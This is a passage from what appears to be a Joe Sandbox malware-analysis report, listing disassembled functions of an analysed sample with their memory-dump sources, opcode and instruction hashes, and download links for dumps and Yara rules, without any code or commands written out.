                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                        • Instruction ID: 19b98aba41c070e8a23dd2d32f00a3f5f4ebbf8df904f5666c6b68fe7fd73a9d
                                        • Opcode Fuzzy Hash: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                        • Instruction Fuzzy Hash: 91B19372A083115BD308CF29C45176BF7E2EFC8310F1AC93EF89997291D778D9459A82
                                        Function 009A2138 Relevance: .3, Instructions: 284COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                        • Instruction ID: 4de9b2291bae23359702a204ed9e784f2708f8afc668d3cde766b321795a2c5d
                                        • Opcode Fuzzy Hash: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                        • Instruction Fuzzy Hash: 9CB1F771A097118FD706EF3DC491215F7E1AFEA280F51C72EE895B7662EB31E8818780
                                        Function 009E1EE8 Relevance: .3, Instructions: 274COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                        • Instruction ID: 0c3a6edc9ab1a7c2de764ffaeaedb23e483fcf5d094ea943d68429111d58f33b
                                        • Opcode Fuzzy Hash: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                        • Instruction Fuzzy Hash: FC91F671A042958FDF16CFAADC80BBAB3ACAF55300F154568EE14AB382D371DD45CBA1
                                        Function 009F96FD Relevance: .3, Instructions: 269COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                        • Instruction ID: 59def4583c57724bc7a2d6b43aedfa92c3a486b30c972fbc3f6c861f94af5511
                                        • Opcode Fuzzy Hash: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                        • Instruction Fuzzy Hash: CFB15A31610609DFD715CF28C48AB657BE0FF45364F29865CEA9ACF2A2C375E991CB40
                                        Function 009CB198 Relevance: .3, Instructions: 268COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                        • Instruction ID: b8cf497e5fabe32317cf86b196da33b4be0ffa5516b6140fa408ecce6ef2dc80
                                        • Opcode Fuzzy Hash: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                        • Instruction Fuzzy Hash: F6C14A75A0471A8FC715DF28C08055AB3F2FF88350F258A6DE8999B721D731E996CF81
                                        Function 009DD5A8 Relevance: .3, Instructions: 258COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                        • Instruction ID: f6588181da8f8331f890e047ad221774791c411d4de61f1fca1f7864548a9467
                                        • Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                        • Instruction Fuzzy Hash: 5F9166308297916AEB168B38CC427BAB798FFE6350F14C31BF98872591FB72C5809344
                                        Function 009ED39E Relevance: .2, Instructions: 242COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                        • Instruction ID: 8f8907358ca01554db1dd88375805d2049803cc201f65d1c60d7e52499c0202e
                                        • Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                        • Instruction Fuzzy Hash: 3AA12C72A01A59CFEB1ACF55CCC1A9ABBB5FB58314F14C62AD41AE72A0D334A944CF50
                                        Function 009B4288 Relevance: .2, Instructions: 240COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                        • Instruction ID: 64dc6a948babd3f818f9d3d5f185530069d983f9e5b28e87fd5e437bc1385181
                                        • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                        • Instruction Fuzzy Hash: 30A16D72A087119BD308CF25C89075BF7E2EFC8710F1ACA3DB89997254D7B4E9419B82
                                        Function 00D0B700 Relevance: .2, Instructions: 209COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 77449240538ecbbaf4850280d21317eb51a4a9b33477db35bac0bc2197c3aded
                                        • Instruction ID: d6fb0b7162f9a658c4450b0ceab02dc7644a7871edcede083bf5bcbd9cfd7988
                                        • Opcode Fuzzy Hash: 77449240538ecbbaf4850280d21317eb51a4a9b33477db35bac0bc2197c3aded
                                        • Instruction Fuzzy Hash: FC616CF3E093155BF3406A3DCC4472AB6C69BC4724F2F8639EA88E7785E87949064786
                                        Function 00DF692D Relevance: .2, Instructions: 201COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c4209c0623c8021a4756a9901c15762395f145ace1a27711474056553d0d4c91
                                        • Instruction ID: 7e7b19e0f58ee895a6049e1755d939f6bcd1f81135a94dbc93a33ee59c0a9e56
                                        • Opcode Fuzzy Hash: c4209c0623c8021a4756a9901c15762395f145ace1a27711474056553d0d4c91
                                        • Instruction Fuzzy Hash: E15135B250C204EFD3045E28DC8163AB7E4EB54320F26CA2EE7C6D3B40E635D9409B67
                                        Function 00CEB13B Relevance: .2, Instructions: 192COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 838354de4dcfa1da1a4c620613b84b29f9c98d8074fe7fa58f42d1f07789aa59
                                        • Instruction ID: 7a7a92e7972345aed702539612136588d01e2b0b89edfa48ec7528253847bd61
                                        • Opcode Fuzzy Hash: 838354de4dcfa1da1a4c620613b84b29f9c98d8074fe7fa58f42d1f07789aa59
                                        • Instruction Fuzzy Hash: 215129F3A086049BE314AA29DC857AABBE6DFD4320F1F853DD7D4D3784F53A48018686
                                        Function 00D809A1 Relevance: .2, Instructions: 179COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ff7c6ba518b489ed6f350127ddb8e0bfc615a898a699330b1ff9b6f53c16c997
                                        • Instruction ID: 2dcaa9122320b033609f71172c29e69dbc34dcb25dec7ec616e8d8eedda818af
                                        • Opcode Fuzzy Hash: ff7c6ba518b489ed6f350127ddb8e0bfc615a898a699330b1ff9b6f53c16c997
                                        • Instruction Fuzzy Hash: 075105F3D0C2209FE3586A29DC4577ABBE5EF54720F1A463DE9C8D3380EA7919448686
                                        Function 00DBA1AF Relevance: .1, Instructions: 132COMMON
